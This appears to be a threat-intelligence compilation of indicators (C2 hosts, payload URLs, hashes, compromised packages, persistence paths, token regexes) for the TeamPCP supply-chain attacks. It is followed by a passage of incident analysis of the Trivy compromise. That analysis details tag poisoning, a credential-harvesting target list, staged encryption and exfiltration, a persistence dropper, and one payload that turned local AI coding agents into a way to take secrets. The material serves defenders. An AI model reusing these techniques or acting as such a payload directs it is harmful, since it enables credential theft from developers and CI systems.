163.245.223.12

185.77.218.4

193.32.126.157

23.234.107.104

34.205.27.48

 

staging
server

43.228.157.123

43.228.157.123/MidwestGrey.exe

43.228.157.123/kfhogts

43.228.157.123/oqqqqoa.mp3

 

File
Hashes
-
5

staging server malware

81eda518ff6ebb25e6aa8d626b78cd2eb6cb38b5d7efb34e021289e76993414b

ea47cebe2fbbf06c22b9bd9b9d72dd4fe64aed4e68675aa5e693312a773e09e9

 

certificates

30015dd1e2cf4dbd49fff9ddef2ad4622da2e60e5c0b6228595325532e948f14

41c4f2f37c0b257d1e20fe167f2098da9d2e0a939b09ed3f63bc4fe010f8365c

d8caf4581c9f0000c7568d78fb7d2e595ab36134e2346297d78615942cbbd727

 

Payload
Repositories

 

Kics-docker

Network
Indicators-
2

april
c2

94.154.172.43

audit.checkmarx.cx

 

File
Hashes-
5

kics
docker april

24680027afadea90c7c713821e214b15cb6c922e67ac01109fb1edb3ee4741d9

2a6a35f06118ff7d61bfd36a5788557b695095e7c9a609b4a01956883f146f50

 

kics
docker digests

sha256:2588a44890263a8185bd5d9fadb6bc9220b60245dbcbc4da35e1b62a6f8c230d

sha256:222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b

sha256:a0d9366f6f0166dcbf92fcdc98e1a03d2e6210e8d7e8573f74d50849130651a0

 

GitHub
Artifacts
-
7

checkmarx
actions

Checkmarx/kics @ 22769adb

Checkmarx/ast-github-action PR#307

 

container
images

docker.io/checkmarx/kics:latest

docker.io/checkmarx/kics:v2.1.20

docker.io/checkmarx/kics:v2.1.21

docker.io/checkmarx/kics:alpine

docker.io/checkmarx/kics:Debian

 

Malware
Signatures
-
3

attribution
strings

beautifulcastle

LongLiveTheResistanceAgainstMachines

KICS-Telemetry/2.0

 

Payload
Repositories

 

Bitwarden

Network Indicators- 2

april c2

94.154.172.43

audit.checkmarx.cx

 

File Hashes- 4

bitwarden cli

18f784b3bc9a0bcdcb1a8d7f51bc5f54323fc40cbd874119354ab609bef6e4cb

f35475829991b303c5efc2ee0f343dd38f8614e8b5e69db683923135f85cf60d

8605e365edf11160aad517c7d79a3b26b62290e5072ef97b102a01ddbb343f14

167ce57ef59a32a6a0ef4137785828077879092d7f83ddbc1755d6e69116e0ad

 

GitHub Artifacts- 2

compromised accounts

aDrupont4191

 

npm packages

@bitwarden/[email protected]

 

Malware Signatures- 6

attribution strings

Shai-Hulud: The Third Coming

beautifulcastle

LongLiveTheResistanceAgainstMachines

 

persistence paths

~/.claude.json

~/.kiro/settings/mcp.json

 

network behavior

Russian locale exit

 

Payload Repositories

 

Xinference

Network
Indicators
-
1

april
c2

whereisitat.lucyatemysuperbox.space

 

File
Hashes
-
3

xinference packages

9d5bf42dedbefee145b9b3704d26b54668fd856f990299ec64f6b45b18e3f0bf

96938e023f9ab0e963201522729a77e826b7bf336b1e5c972be76f8438ea4c1b

06c88b286610e397ad22b8453b75ebf1e7bfe3b22c558577e17c39f21ef78a9c

 

GitHub
Artifacts-
4

compromised
accounts

XprobeBot

 

pypi
packages

xinference==2.6.0

xinference==2.6.1

xinference==2.6.2

 

 

Malware
Signatures-
3

attribution
strings

# hacked by teampcp

love.tar.gz

X-QT-SR: 14

 

Payload
Repositories

 

Mini-shai-hulud

Network
Indicators
-
1

april
c2

zero.masscan.cloud

 

File
Hashes-
18

mini
shai hulud dropper

4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34

 

mini
shai hulud sap

eb6eb4154b03ec73218727dc643d26f4e14dfda2438112926bb5daf37ae8bcdb

1d9e4ece8e13c8eaf94cb858470d1bd8f81bb58f62583552303774fa1579edee

6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95

a1da198bb4e883d077a0e13351bf2c3acdea10497152292e873d79d4f7420211

258257560fe2f1c2cc3924eae40718c829085b52ae3436b4e46d2565f6996271

80a3d2877813968ef847ae73b5eeeb70b9435254e74d7f07d8cf4057f0a710ac

86282ebcd3bebf50f087f2c6b00c62caa667cdcb53558033d85acd39e3d88b41

29ac906c8bd801dfe1cb39596197df49f80fff2270b3e7fbab52278c24e4f1a7

 

mini
shai hulud intercom

50212a875643520353df158196b9b3be4595094125ad8d2d2c48bdd9cb04ce1f

832a976d1a8d54e296e8479aedbd89fa24baa02b8409a78bf06d4d03340881bd

b084743bd16043461e68b604dde80a8b386b405eae6f66c1103fb4fd6831d4a7

66664a49edbcee0ed0d8365839707916e92d3aa06e7f26f33c9dcc58e5fc1ef3

907aec5b1288057a3e0885226918b6930a62a0f348ce23de026a683238c7903e

 

mini
shai hulud lightning

5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1

8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2

 

mini
shai hulud persistence

14eb4ce01dd4307759887ff819359b70d7d9ff709ecde039a5abc1aac325b128

927387d0cfac1118df4b383decc2ea6ba49c9d2f98b47098bcbcba1efc026e1f

 

GitHub
Artifacts
-
8

pypi
packages

lightning==2.6.2

lightning==2.6.3

 

npm
packages

@cap-js/[email protected]

@cap-js/[email protected]

@cap-js/[email protected]

[email protected]

[email protected]

 

packagist
packages

intercom/[email protected]

 

Malware
Signatures
-
33

attribution
strings

A Mini Shai-Hulud has Appeared

OhNoWhatsGoingOnWithGitHub

EveryBoiWeBuildIsAWormyBoi

beautifulcastle

claude

chore: update dependencies

dependabout

 

persistence
paths

.claude/router_runtime.js

.claude/setup.mjs

.claude/settings.json

.vscode/setup.mjs

.vscode/tasks.json

results/results-*.json

/tmp/tmp.987654321.lock

 

network
behavior

Russian locale exit

POST /v1/telemetry

GitHub GraphQL API commit search

 

dune
repo words

sardaukar

mentat

fremen

atreides

harkonnen

gesserit

prescient

fedaykin

tleilaxu

siridar

kanly

sayyadina

ghola

powindah

prana

kralizec

 

Payload
Repositories

 

Checkmarx-jenkins

Network
Indicators
-
4

checkmarx
jenkins c2

checkmarx.cx

91.195.240.123

updates.checkmarx.cx

94.154.172.183

 

File Hashes- 9

checkmarx jenkins may9

01ff1e56fd59a8fa525d97e670f7f297a1a204331b89b2cd4e36a9abc6419203

f50a96d26a5b0beb29de4127e82b2bf350c21511e5a43d286e43f798dc6cd53f

3ddb8967919a801b3c383e58cddceab21138134c6a26560d99e2672e86f36f2a

85487e68fc46fe3faec2617ac4f2ee5d

1ac56ecda9a255c23eabd70c276905a0

9f9f83795fc162b7e44bc6859fc80535

HeyEveryoneCheckmarxIsNotGonnaMakeIt

/tmp/tmp.checkmarx_tracker.lock

~/hugs_from_teamPCP.txt

 

Payload
Repositories

Mini-shi-hulud-2

Network
Indicators
-
12

mini
shai hulud 2 c2

git-tanstack.com

83.142.209.194

83.142.209.194/transformers.pyz

api.masscan.cloud

seed1.getsession.org

seed2.getsession.org

seed3.getsession.org

filev2.getsession.org

05f9e609d79eed391015e11380dee4b5c9ead0b6e2e7f0134e6e51767a87323026

 

durabletask c2

83.142.209.194

 

elementary data c2

litter.catbox.moe/h8nc9u.js

litter.catbox.moe/7rrc6l.mjs

 

File
Hashes-
8

mini
shai hulud 2 malware

ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c

2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96

2258284d65f63829bd67eaba01ef6f1ada2f593f9bbe41678b2df360bd90d3df

7c12d8614c624c70d6dd6fc2ee289332474abaa38f70ebe2cdef064923ca3a9b

6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b

 

mini
shai hulud 2 persistence

src/mistralai/client/__init__.py

/tmp/transformers.pyz

MISTRAL_INIT=1

 

GitHub
Artifacts
-
25

tanstack
attack

zblgg/configuration

79ac49eedf774dd4b0cfa308722bc463cfe5885c

 

compromised
accounts

zblgg

voicproducoes

 

pypi
packages

guardrails-ai==0.10.1

mistralai==2.4.6

 

npm
packages

@tanstack/[email protected]

@tanstack/[email protected]

@tanstack/[email protected]

@tanstack/[email protected]

@tanstack/*

@tanstack/[email protected]

@uipath/*

@uipath/[email protected]

@uipath/[email protected]

@uipath/[email protected]

@mistralai/[email protected]

@mistralai/[email protected]

@mistralai/[email protected]

@mistralai/[email protected]

@mistralai/[email protected]

@mistralai/[email protected]

@mistralai/[email protected]

@mistralai/[email protected]

@mistralai/[email protected]

 

Malware
Signatures-
1

persistence
paths

~/.config/gh/hosts.yml

 

Payload
Repositories

 

Cemu

Network
Indicators
-
1

mini
shai hulud 2 c2

83.142.209.194

 

File Hashes- 7

cemu releases

0f35abda19fb69430c32228465396094b866d887427bf551e353ab31256a9dd6

d07a29c4458d00e42d5d9e6345932592e91644d6b821bacdb7a543c628e0b41a

f140e76236b96adf7cdc796227af9808665143bc674debb77729fa3e4b8327cc

1bf72f05191d849049d4a38fced2277ac5cfc54b7ae591f564e7a14add7c886d

 

cemu persistence

/tmp/.transformers

83.142.209.194/v1/weights

python_mistral_cemu_files/

 

Payload
Repositories

Durabletask

Network
Indicators
-
3

durabletask
c2

check.git-service.com

t.m-kosche.com

83.142.209.194

 

File
Hashes
-
4

durabletask
packages

7d80b3ef74ad7992b93c31966962612e4e2ceb93e7727cdbd1d2a9af47d44ba8

aeaf583e20347bf850e2fabdcd6f4982996ba023f8c2cd56bbd299cfd56516f5

877ff2531a63393c4cb9c3c86908b62d9c4fc3db971bc231c48537faae6cb3ec

 

durabletask
malware

069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce

 

GitHub
Artifacts
-
4

pypi
packages

guardrails-ai==0.10.1

durabletask==1.4.1

durabletask==1.4.2

durabletask==1.4.3

 

Malware
Signatures
-
5

persistence
paths

/tmp/managed.pyz

/tmp/rope-*.pyz

~/.cache/.sys-update-check

~/.cache/.sys-update-check-k8s

/tmp/.rope_state/ssm_instances.json

 

Payload
Repositories

 

Antv

Network
Indicators
-
7

durabletask
c2

t.m-kosche.com

 

antv
c2

t.m-kosche.com

185.95.159.32

t.m-kosche.com:443/api/public/otel/v1/traces

api.github.com/search/commits?q=firedalazer

fulcio.sigstore.dev/api/v2/signingCert

rekor.sigstore.dev/api/v1/log/entries

 

File
Hashes
-
10

antv vscode

1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8

b0cefb66b953e5184b6adb3035e9e267335ac5eabfe1848e07834777b9397b74

e7347d90653efc565f03733a95e9209d78f9cfa81e31ff2b2dd9d48d75a4b8b1

43f2b001846c4966073ebffa5be8f15e491a1e7d32bbd805d57406ff540e0dd9

228a2cf081d4cbea9b91cde14a8f9c4a4d003e7f32431496953fd6bac266f5a3

cb86f4f223daa54467c7782a0d8607e9c84e2bb633e6f0e51d9a19579e200990

 

antv backdoor

fb5c97557230a27460fdab01fafcfabeaa49590bafd5b6ef30501aa9e0a51142

783b4019fc5b942a29846132d28441c8fc31bed8

b06b126b9e26af03a7ef2f8b8e90d446

 

antv npm payload

a68dd1e6a6e35ec3771e1f94fe796f55dfe65a2b94560516ff4ac189390dfa1c

 

GitHub
Artifacts
-
39

compromised
accounts

atool

 

antv
imposter commits

antvis/G2 @ 1916faa365f2788b6e193514872d51a242876569

antvis/G2 @ 7cb42f57561c321ecb09b4552802ae0ac55b3a7a

antvis/G2 @ dc3d62a2181beb9f326952a2d212900c94f2e13d

 

antv
vscode commits

558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2

ba642fe2c7c65e42dd7f6444b83023dc6827e08c

acfc3f957a63b4cde93ff645f2b6bf26a8ed1bbf

9d88f040c44b5f4d5f9db15ff89310776c168e99

 

antv
actions

actions-cool/issues-helper

actions-cool/maintain-one-comment

1c9e803c80cc7fed000022d4c94f4b5bc2e90062

f0448c62fc57b8a5ce23d8acd6e795cdd76a3b6c

b9c83f01929e190cda300e76f688bf7ea7e37a7a

 

npm packages

@antv/*

@antv/[email protected]

@antv/[email protected]

@antv/g6

@antv/x6

@antv/l7

@antv/s2

@antv/f2

@antv/g

@antv/g2plot

@antv/graphin

@antv/data-set

@antv/[email protected]

@antv/[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

canvas-nest.js

jest-canvas-mock

jest-date-mock

vscode extensions

[email protected]

 

Malware
Signatures
-
56

attribution
strings

firedalazer

niagA oG eW ereH :duluH-iahS

python-requests/2.31.0

python-httpx/0.28.1

Run Copilot

Build action for vX.Y.Z

New Package

format-results

 

persistence
paths

~/.config/gh/hosts.yml

~/.local/share/kitty/cat.py

~/Library/LaunchAgents/com.user.kitty-monitor.plist

~/.config/systemd/user/kitty-monitor.service

/var/tmp/.gh_update_state

/tmp/kitty-*

~/.local/bin/gh-token-monitor.sh

.github/workflows/codeql.yml

 

network
behavior

bun run index.js

/proc//mem read

169.254.169.254

169.254.170.2

127.0.0.1:8200

gh[op]_[A-Za-z0-9]{36,}

npm_[A-Za-z0-9]{36,}

registry.npmjs.org/-/npm/v1/oidc/token/exchange/package/

runner ALL=(ALL) NOPASSWD:ALL

__DAEMONIZED=1

 

dune
repo words

sardaukar

mentat

fremen

atreides

harkonnen

gesserit

prescient

fedaykin

tleilaxu

siridar

kanly

sayyadina

ghola

powindah

prana

kralizec

sandworm

ornithopter

heighliner

stillsuit

lasgun

sietch

melange

thumper

navigator

futar

phibian

slig

cogitor

laza

 

Payload
Repositories

 

Elementary-data

Network
Indicators
-
8

elementary
data c2

igotnofriendsonlineorirl-imgonnakmslmao.skyhanni.cloud

188.114.96.3

litter.catbox.moe/iqesmbhukgd2c7hq.sh

 

elementary
data markers

X-Rise-To-The-Trinny: agree

trin.tar.gz

$TMPDIR/.trinny-security-update

%TEMP%\.trinny-security-update

050afbe046d7545f5af1a0d3fcfbaf6e993fd93d487b431f09bc9e963c7220a135

 

File
Hashes-
8

elementary
data packages

d37874c6c8a2d2a7a252810a1999ece8bb39e9b3ab2b7e8bf40da15bd36a1584

83f9b178b520d3ad8b49bc9ea2b454eacf64fc302ec42aff6f90a1245af299e9

96dc65f67f54411d3de6b23a33a8f73665e2703d7261b7f1720cdc089c528eea

fcb538f8a937dd2e97532899be80827772aa99f0523c582aef301682d6e96b75

cc802c0d8b918c99b39f26f473e8090b7073d45268b399df2e2ff5d5549c2a37

0bf22f5de2169f2f614c12aaecf586fd7a203cff41f4b79583963a30660a7019

 

elementary
data artifacts

b1e4b1f3aad0d489ab0e9208031c67402bbb8480

sha256:31ecc5939de6d24cf60c50d4ca26cf7a8c322db82a8ce4bd122ebd89cf634255

 

GitHub
Artifacts
-
3

compromised
accounts

realtungtungtungsahur

 

container
images

ghcr.io/elementary-data/elementary:0.23.3

 

pypi
packages

elementary-data==0.23.3

 

Payload
Repositories

 

 

Miasma

Network
Indicators
-
6

miasma
indicators

google-api-nodejs-client/7.0.0 gl-node/20.11.0 gccl/7.0.0

IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner

Miasma: The Spreading Blight

thebeautifulmarchoftime

tmp.0987654321.lock

__IS_DAEMON

 

File
Hashes
-
6

miasma packages

88896d478986d453f5da79b311de39d9b4b1bea95c21af1d8ef181b0f4e52fe9

 

miasma malware

21b6409a7b84446310daca5409ad6112ac60a1e4bef97736e53fff5f63bfdef4

0dc06ecdaa63fe24859cfd955053c23245c536e4733480239d14bebf12688e35

 

miasma
persistence

.claude/settings.json

.vscode/tasks.json

.github/setup.js

 

Payload
Repositories

 

Pcpcat

Network
Indicators
-
11

pcpcat
c2

67.217.57.240

44.252.85.168

 

pcpcat
payloads

67.217.57.240:666/files/proxy.sh

67.217.57.240:666/files/pcpcat.py

67.217.57.240:666/files/react.py

67.217.57.240:666/files/redis-deploy.py

67.217.57.240:666/files/BORING_SYSTEM

67.217.57.240:666/files/kube.py

 

pcpcat
markers

PCPcat-FRP-Token-2024

pcpcat-pool

PCPcat-Group-Key

 

Malware
Signatures
-
11

persistence
paths

/etc/systemd/system/pcpcat-gost.service

/etc/systemd/system/pcpcat-frp.service

/etc/systemd/system/pcpcat-scanner.service

/etc/systemd/system/pcpcat-react.service

/etc/systemd/system/pcpcat-redis.service

/etc/systemd/system/pcpcat-boring.service

/etc/cron.d/teampcp

 

kubernetes

alpine:latest

system-monitor

teampcp

 

network
behavior

NEXT_REDIRECT error exfil

 

Payload
Repositories

 

Fri, Feb 27- 12:00 UTC

Malicious Trivy VSCode extension published to OpenVSX

Attacker releases malicious v1.8.12
of the Trivy VSCode extension to OpenVSX using a former employee's token.
Payload leveraged local AI coding agents to exfiltrate secrets. Extension
removed March 1. CVE-2026-28353 (CVSS 10.0).

Disclosure- Trivy VSCode
Extension version 1.8.12, which was distributed via OpenVSX marketplace
was
compromised and contained malicious code designed to leverage local AI coding agent to collect
and exfiltrate sensitive information.


Users using the affected artifact are advised to immediately remove it and
rotate environment secrets. The malicious artifact has been removed from the
marketplace. No other affected artifacts have been identified.

Critical

CVE ID

CVE-2026-28353

Weaknesses

CWE-506-  Embedded Malicious Code

The product contains code that appears to be malicious in
nature. Learn
more on MITRE.

Phase 01 Initial Compromise

( 4 events, 1
milestone)

Mar 19-22-

Trivy (Aqua) - 27 events

Compromised via incomplete
credential rotation after Feb PwnRequest. 75/76 tags hijacked; payload stole
CI/CD secrets.

CVE-2026-33634

(https://www.cve.org/CVERecord?id=CVE-2026-33634)

Trivy is a security scanner. On
March 19, 2026, a threat actor used compromised credentials to publish a
malicious Trivy v0.69.4 release, force-push 76 of 77 version tags in
`aquasecurity/trivy-action` to credential-stealing malware, and replace all 7
tags in `aquasecurity/setup-trivy` with malicious commits. This incident is a
continuation of the supply chain attack that began in late February 2026.
Following the initial disclosure on March 1, credential rotation was performed
but was not atomic (not all credentials were revoked simultaneously). The
attacker could have use a valid token to exfiltrate newly rotated secrets
during the rotation window (which lasted a few days). This could have allowed
the attacker to retain access and execute the March 19 attack. Affected
components include the `aquasecurity/trivy` Go / Container image version
0.69.4, the `aquasecurity/trivy-action` GitHub Action versions 0.0.1 – 0.34.2
(76/77), and the`aquasecurity/setup-trivy` GitHub Action versions 0.2.0 –
0.2.6, prior to the recreation of 0.2.6 with a safe commit. Known safe versions
include versions 0.69.2 and 0.69.3 of the Trivy binary, version 0.35.0 of
trivy-action, and version 0.2.6 of setup-trivy. Additionally, take other
mitigations to ensure the safety of secrets. If there is any possibility that a
compromised version ran in one's environment, all secrets accessible to
affected pipelines must be treated as exposed and rotated immediately. Check
whether one's organization pulled or executed Trivy v0.69.4 from any source.
Remove any affected artifacts immediately. Review all workflows using
`aquasecurity/trivy-action` or `aquasecurity/setup-trivy`. Those who referenced
a version tag rather than a full commit SHA should check workflow run logs from
March 19–20, 2026 for signs of compromise. Look for repositories named
`tpcp-docs` in one's GitHub organization. The presence of such a repository may
indicate that the fallback exfiltration mechanism was triggered and secrets
were successfully stolen. Pin GitHub Actions to full, immutable commit SHA
hashes, don't use mutable version tags.

Aqua
Statement- (PARTICIAL use link for full)

 (https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/)


  • Late
    February 2026
    :
    Attackers exploited a misconfiguration in
    Trivy’s GitHub Actions environment, extracting a privileged access token
    and establishing a foothold in repository automation and release
    processes.

  • March
    1, 2026
    :
    The Trivy team disclosed the earlier incident and
    executed credential rotation. Subsequent investigation revealed the
    rotation was not fully comprehensive, allowing the threat actor to retain
    residual access via still-valid credentials.

  • March
    19, 2026 (~17:43 UTC):
    The attacker force-pushed 76 of 77
    version tags in the aquasecurity/trivy-action repository and all 7 tags in
    aquasecurity/setup-trivy, redirecting trusted references to malicious
    commits. Simultaneously, the compromised aqua-bot service account triggered
    release automation to publish a malicious Trivy binary designated v0.69.4.

  • March
    19, 2026 (~20:38 UTC):
    The Trivy team identified and
    contained the attack, removing malicious artifacts from distribution
    channels.

  • March
    20, 2026
    :
    Safe versions, user guidance, and indicators of
    compromise were published for defenders.

*********The attacker also attempted to use the compromised
`aqua-bot` service account to push malicious workflows to the open source
`tfsec`, `traceeshark`, and `trivy-action` repositories. These workflows were
designed to steal additional Trivy credentials (not yet confirmed), including
GPG keys and credentials for Docker Hub, Twitter, and Slack (Aqua corporate
uses Teams). The stolen credentials were intended to be exfiltrated to a
Cloudflare Tunnel C2 endpoint (`plug-tab-protective-relay.trycloudflare.com`). 

*******The attacker made imposter commits by spoofing
GitHub users rauchg (pushed to actions/checkout) and DmitriyLewen (pushed to
aquasecurity/trivy).

Rather than introducing a new,
clearly malicious version, the attackers used a more sophisticated approach. By
modifying existing version tags associated with trivy-action, they
injected malicious code into workflows that organizations were already
running.
Because many CI/CD pipelines rely on version tags rather than
pinned commits, these pipelines continued to execute without any indication
that the underlying code had changed.

Just a reminder as we share more
details, the indecent appears to be isolated to the Trivy open source project
in GitHub. We have no indication that Aqua Security’s commercial offerings were
impacted by this activity.

Tag
Poisoning Technique

**For each of the 75 compromised trivy-action tags,
the attacker executed the following technique:


  1. Started
    from the master HEAD tree (57a97c7e), containing the latest code.

  2. Swapped
    only entrypoint.sh with the infostealer payload, leaving all other files
    intact.

  3. Looked
    up the original commit the tag previously pointed to.

  4. Cloned
    that original commit’s metadata — author name, email, committer, both
    timestamps, and the full commit message including PR number and “Fixes”
    references.

  5. Set
    the parent to 57a97c7e (master HEAD) instead of the original parent.

  6. Force-pushed
    the tag to this newly crafted commit.

The result was a file tree
identical across all 75 malicious commits (master plus the swapped
entrypoint.sh), with only the spoofed commit metadata varying per tag to appear
legitimate in git log.

Forensic
indicators of the forgery:


  • Original
    commits were GPG-signed by GitHub when merged via the web UI; the
    attacker’s commits are unsigned.

  • Each
    commit claims a date from the original release (2021, 2022, etc.) but has
    a parent dated March 2026, an impossible lineage.

  • Each
    malicious commit modifies only entrypoint.sh; the originals touched
    multiple files.

  • GitHub’s
    release page shows “0 commits to master since this release” for tags from
    2020, even though there should be hundreds of commits.

Why
tag 0.35.0 was not poisoned
:

 It already pointed to
master HEAD (57a97c7e), the base tree the attacker used. Replacing it would
have produced a self-referencing commit and risked drawing attention to the
latest release.

GitHub
“Immutable” badge caveat
:

 GitHub’s release UI
displayed “Immutable” badges next to each poisoned tag. The attacker may have
deliberately published immutable releases after force-pushing, locking in the
malicious state. Organizations should not rely solely on the “Immutable” indicator.
Pinning to full commit SHAs remains the only truly immutable protection.

Threat
Actor Attribution

*,**The malware self-identifies as “TeamPCP Cloud stealer” in a Python
comment embedded in the filesystem credential harvester payload.
TeamPCP
(also tracked as DeadCatx3, PCPcat, and ShellForce) is a documented
cloud-native threat actor known for exploiting misconfigured Docker APIs,
Kubernetes clusters, Ray dashboards, and Redis servers. The group has been
linked to worm-driven ransomware, data exfiltration, and cryptomining
campaigns, and was profiled by Flare and reported by The Hacker News in
February 2026. Wiz tracks the actor formally at threats.wiz.io/all-actors/teampcp.

The self-labeling could be a false flag,
but the technical overlap with prior TeamPCP tooling, including the
cloud-native theft-and-monetization profile, the emphasis on cryptocurrency
wallet targeting, and the use of ICP-hosted infrastructure, makes genuine
attribution plausible.

Technical
Analysis of the Malicious Payloads

In affected environments, the
payload was designed to collect sensitive information, including API tokens,
cloud credentials (AWS, GCP, Azure), SSH keys, Kubernetes tokens, Docker
configuration files, Git credentials, and other secrets available within CI/CD
systems. Critically, the malware executed prior to legitimate Trivy scanning
logic, so compromised workflows appeared to complete normally while silently
exfiltrating data to attacker-controlled infrastructure via two pathways (see
IOCs below).

Malicious
GitHub Action Payload (entrypoint.sh)

**The malicious entrypoint.sh injected into both
trivy-action and setup-trivy is 204 lines long. Lines 4–105 contain the
infostealer; lines 106–204 contain the legitimate Trivy scanning code. Because
the malware executes first and the real scan follows as usual, users see the
expected output and may not notice anything is wrong. The payload operates in
three distinct stages:

Stage
1 — Collection (lines 4–36):


  • The
    malware locates GitHub Actions runner processes (Runner.Worker, Runner.
    Listener, runsvc, run.sh) and reads null-delimited environment variables
    from /proc//environ, filtering for keys containing “env” or
    “ssh”.

  • On
    GitHub-hosted runners
    :
    A base64-encoded Python script is
    decoded and executed with sudo (GitHub-hosted Linux runners provide
    passwordless sudo). It locates the Runner. Worker process, parses
    /proc//maps to identify all readable memory regions, and dumps
    each region from /proc//mem. The shell wrapper then searches
    for the JSON pattern {“value”:””, “isSecret”: true} — the
    internal format GitHub Actions uses to store secrets in the Runner. Worker
    .NET process heap.

  • On
    self-hosted runners
    :
    A comprehensive filesystem credential
    harvester (self-identified as “TeamPCP Cloud stealer”) targets 50+
    sensitive file paths across SSH, Git, AWS, GCP, Azure, Kubernetes, Docker,
    databases, CI/CD configs, TLS private keys, VPN configs, shell history, and
    cryptocurrency wallets.



































































Category



Targets



Reconnaissance



hostname,
whoami, uname −a, ip addr, ip route, printenv



SSH



~/.ssh/id_rsa,
id_ed25519, id_ecdsa, id_dsa, authorized_keys, known_hosts, config;
/etc/ssh/ssh_host_*_key



Git



~/.git-credentials,
~/.gitconfig



AWS



~/.aws/credentials,
~/.aws/config, AWS_* env vars, EC2 IMDS (169.254.169.254), ECS
(169.254.170.2)



GCP



~/.config/gcloud/*,
application_default_credentials.json, GOOGLE_APPLICATION_CREDENTIALS



Azure



~/.azure/*,
AZURE_* env vars



Kubernetes



~/.kube/config,
/etc/kubernetes/*.conf, service account tokens, kubectl get secrets



Docker



~/.docker/config.json,
/kaniko/.docker/config.json



Database



~/.pgpass,
~/.my.cnf, ~/.mongorc.js, /etc/mysql/my.cnf, /etc/redis/redis.conf



Package
mgrs



~/.npmrc,
~/.vault-token, ~/.netrc



CI/CD
configs



terraform.tfvars,
terraform.tfstate, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml



TLS
keys



*.key,
*.pem, *.p12, *.pfx; /etc/ssl/private/, /etc/letsencrypt/



VPN



/etc/wireguard/*.conf,
wg showconf all



Crypto
wallets



Bitcoin,
Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero; Ethereum keystores; Cardano
keys; Solana validator keypairs; Ledger device files; Anchor deploy keys



Shell
history



~/.bash_history,
~/.zsh_history, ~/.mysql_history, ~/.psql_history


Stage
2 — Encryption (lines 39–68):


  • Generates
    32 bytes of random session material.

  • Encrypts
    collected data with AES-256-CBC using PBKDF2 key derivation.

  • Wraps
    the session material with the attacker’s embedded RSA-4096 public key
    using OAEP padding.

  • Bundles
    encrypted payload and wrapped session key into tpcp.tar.gz.

Stage
3 — Exfiltration (lines 70–104):


  • Primary
    channel:
    HTTPS POST to scan.aquasecurtiy[.]org (typosquat) with
    X-Filename: tpcp.tar.gz header.

  • Fallback
    channel:
    If primary fails and INPUT_GITHUB_PAT is available,
    creates a public repository named tpcp-docs on the victim’s own GitHub
    account, creates a timestamped release, and uploads the encrypted bundle
    as a release asset. Note: requires a user-scoped PAT; the default
    GITHUB_TOKEN would fail.

  • Cleanup: All
    temporary files are removed.

Malicious
Trivy Binary (v0.69.4)

*When the malicious binary is executed, it starts
both the legitimate Trivy service and the malicious code in parallel.

Data
Theft:
 

The malicious process gathers
environment variables, scans the filesystem for stored credentials, and
enumerates network interfaces. It then compresses and encrypts the data and
attempts to exfiltrate it via a POST request to scan.aquasecurtiy[.]org. If that
fails, the malware attempts to use a stolen GITHUB_TOKEN to create a tpcp-docs
repository and post the data there.

Persistence
Mechanism:

 The malicious binary
checks whether it is running on a developer machine (not GitHub Actions) by
verifying that GITHUB_ACTIONS is not “true”. If that check passes, it writes a
Python dropper to ~/.config/systemd/user/sysmon.py and creates a systemd user unit
that runs the script persistently. sysmon.py initially sleeps for 5 minutes,
then polls the ICP-hosted C2 canister
(tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io). If a non-YouTube link is found, the
dropper downloads to /tmp/pglog and executes it in a new session.

At the time of initial analysis
(March 20), the ICP endpoint was set to a RickRoll URL. By March 22, the
ICP-hosted fallback C2 was actively serving an iteratively developed payload
designated kamikaze.sh. As of March 22, 21:31 UTC, the ICP canister was marked
“Unavailable Due to Policy Violation.”

Developer
Machine Remediation:
 

Any system on which the malicious
binary was executed outside of GitHub Actions should be checked for the
presence of ~/.config/systemd/user/sysmon.py and associated systemd unit files,
and these should be removed immediately.

What
Was Affected

The following open source components were affected:


  • Trivy
    binary release
    :
    v0.69.4

  • GitHub
    Action aquasecurity/trivy-action
    :
    76 of 77 version tags
    force-pushed to malicious commits (only v0.35.0 was unaffected, protected
    by GitHub’s immutable releases feature)

  • GitHub
    Action aquasecurity/setup-trivy
    : multiple version tags compromised

Any CI/CD workflow that referenced these actions via a
mutable version tag, or that downloaded:


  • trivy
    v0.69.4
    , between approximately 18:22 UTC and 21:42 UTC on
    March 19, 2026,

  • trivy-action
    v0.69.4
    , between approximately 17:43UTC UTC on March 19, 2026
    and 05:40 UTC on March 20, 2026
    ,

  • setup-trivy,
    between approximately 17:43 UTC and 21:44 UTC on March 19, 2026,

These should be treated as
potentially compromised. All secrets accessible to those runner environments
must be considered exposed.

What
Was Not Affected

There is no indication that Aqua
Security’s commercial products were impacted by this incident, including Trivy
as delivered within the Aqua Platform.

This statement does not apply to
the independent use of open-source Trivy components outside the Aqua Platform.
Users who consume open-source Trivy directly should follow the remediation
guidance below.

Enterprise
Environment Isolation

The commercial platform is
architecturally isolated from the compromised open-source environment:


  • Built
    and operated entirely separate from GitHub

  • No
    shared repositories, CI/CD infrastructure, secrets, or signing systems

  • Dedicated
    pipelines and access controls, including SSO, IP allowlisting, and ZTNA

  • Controlled
    integration process where the commercial fork lags open-source releases
    and undergoes a gated security review

As a result, the malicious Trivy
v0.69.4 release was never incorporated into the commercial environment, and the
GitHub-based attack path does not apply to the commercial build system.

What
Actions We Are Taking

Our corporate security and
engineering teams are actively working in close coordination with the Trivy
maintainers and the broader security community to investigate the incident and
ensure full containment. Steps taken include:


  • Artifact removal: All
    malicious releases, including v0.69.4 binaries across GitHub Releases,
